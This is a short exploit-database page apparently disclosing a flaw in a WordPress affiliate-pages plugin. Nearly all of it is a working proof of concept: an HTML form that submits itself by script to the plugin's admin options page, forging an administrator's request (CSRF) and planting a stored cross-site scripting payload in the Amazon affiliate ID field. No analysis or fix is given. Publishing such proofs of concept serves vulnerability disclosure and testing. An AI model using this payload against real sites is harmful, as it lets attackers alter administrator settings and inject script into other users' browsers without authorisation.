Share
## https://sploitus.com/exploit?id=WPEX-ID:01B9B1C2-439E-44DF-BF01-026CB13D7D40
Make a logged in admin access a page with the following code:
<form action="https://example.com/wp-admin/admin.php?page=amtp-addpages-page" method="POST">
<input type="text" name="amazon_affid" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="amazon_apikey" value="">
<input type="text" name="amazon_secret" value="">
<input type="text" name="amazon_site" value="com">
<input type="text" name="amazon_search_method" value="broad">
<input type="text" name="amazon_desc_length" value="300">
<input type="text" name="amazon_noshortcode" value="Yes">
<input type="text" name="amazon_skip_if" value="nodesc">
<input type="text" name="ebay_campid" value="">
<input type="text" name="ebay_lang" value="en-US">
<input type="text" name="ebay_country" value="0">
<input type="text" name="ebay_template" value="">
<input type="text" name="ebay_cache_length" value="100">
<input type="text" name="wpsp_post_type" value="page">
<input type="text" name="post_status" value="publish">
<input type="text" name="post_author" value="1">
<input type="text" name="feat_links" value="1">
<input type="text" name="post_comments" value="open">
<input type="text" name="submitoptions" value="Save Options">
<input type="text" name="action" value="editoption">
</form>
<script>
document.forms[0].submit();
</script>